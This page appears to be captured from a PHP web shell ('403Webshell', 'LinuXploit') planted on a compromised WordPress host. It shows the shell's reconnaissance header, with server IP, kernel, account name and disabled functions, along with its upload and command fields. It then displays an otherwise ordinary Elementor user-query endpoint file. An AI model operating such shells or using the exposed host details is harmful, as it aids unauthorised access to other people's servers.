403Webshell
Server IP : 10.19.1.101  /  Your IP : 216.73.216.158
Web Server : Apache
System : Linux web1f13.kinghost.net 5.4.282-1.el8.elrepo.x86_64 #1 SMP Mon Aug 19 18:33:22 EDT 2024 x86_64
User : schererimoveisrs ( 170628)
PHP Version : 7.4.33
Disable Function : apache_child_terminate,c99_buff_prepare,c99_sess_put,dl,exec,leak,link,myshellexec,openlog,passthru,pclose,pcntl_exec,php_check_syntax,php_strip_whitespace,popen,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,shell_exec,show_source,symlink,system,socket_listen,socket_create_listen,putenv
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/schererimoveisrs/www/wp-content/plugins/elementor/modules/wp-rest/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/schererimoveisrs/www/wp-content/plugins/elementor/modules/wp-rest/classes/user-query.php
<?php

namespace Elementor\Modules\WpRest\Classes;

use Elementor\Core\Utils\Collection;
use Elementor\Modules\WpRest\Base\Query as Base;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly.
}

/**
 * @deprecated Use wp/v2/users instead. This endpoint proxies to wp/v2/users internally
 *             and will be removed in 4.6.0 version.
 */
class User_Query extends Base {
	const ENDPOINT = 'user';

	protected function get( \WP_REST_Request $request ) {
		$params = $request->get_params();
		$search_term = trim( $params[ self::SEARCH_TERM_KEY ] ?? '' );

		if ( empty( $search_term ) ) {
			return new \WP_REST_Response( [
				'success' => true,
				'data' => [
					'value' => [],
				],
			], 200 );
		}

		$keys_format_map = $params[ self::KEYS_CONVERSION_MAP_KEY ];

		$requested_count = $params[ self::ITEMS_COUNT_KEY ] ?? 0;
		$validated_count = max( $requested_count, 1 );
		$count = min( $validated_count, self::MAX_RESPONSE_COUNT );

		$wp_request = new \WP_REST_Request( 'GET', '/wp/v2/users' );
		$wp_request->set_param( 'search', $search_term );
		$wp_request->set_param( 'per_page', $count );
		$wp_request->set_param( 'context', 'edit' );

		$response = rest_do_request( $wp_request );

		if ( $response->is_error() ) {
			return new \WP_REST_Response( [
				'success' => true,
				'data' => [
					'value' => [],
				],
			], 200 );
		}

		global $wp_roles;
		$roles = $wp_roles->roles;

		$users = Collection::make( $response->get_data() );

		$result = new \WP_REST_Response( [
			'success' => true,
			'data' => [
				'value' => array_values( $users->map( function ( $user ) use ( $keys_format_map, $roles ) {
					$user_data = [
						'ID' => $user['id'],
						'display_name' => $user['name'],
					];

					if ( ! empty( $user['roles'][0] ) ) {
						$user_role = $user['roles'][0];
						$role_name = $roles[ $user_role ]['name'] ?? ucfirst( $user_role );
						$user_data['role'] = $role_name;
					}

					return $this->translate_keys( $user_data, $keys_format_map );
				} )->all() ),
			],
		], 200 );

		_doing_it_wrong(
			'elementor/v1/user',
			'Use wp/v2/users instead. This endpoint will be removed in 4.6.0 version.',
			'4.0.4'
		);

		return $result;
	}

	protected function get_endpoint_registration_args(): array {
		return [
			self::SEARCH_TERM_KEY => [
				'description' => 'Users to search',
				'type' => 'string',
				'required' => false,
				'default' => '',
				'sanitize_callback' => 'sanitize_text_field',
			],
			self::KEYS_CONVERSION_MAP_KEY => [
				'description' => 'Specify keys to extract and convert, i.e. ["key_1" => "new_key_1"].',
				'type' => [ 'array', 'string' ],
				'required' => false,
				'default' => [
					'ID' => 'id',
					'display_name' => 'label',
					'role' => 'groupLabel',
				],
				'sanitize_callback' => fn ( ...$args ) => self::sanitize_string_array( ...$args ),
			],
			self::ITEMS_COUNT_KEY => [
				'description' => 'Number of users to return',
				'type' => 'integer',
				'required' => false,
				'default' => self::MAX_RESPONSE_COUNT,
			],
		];
	}

	protected static function get_allowed_param_keys(): array {
		return [
			self::KEYS_CONVERSION_MAP_KEY,
			self::ITEMS_COUNT_KEY,
		];
	}

	protected static function get_keys_to_encode(): array {
		return [ self::KEYS_CONVERSION_MAP_KEY ];
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit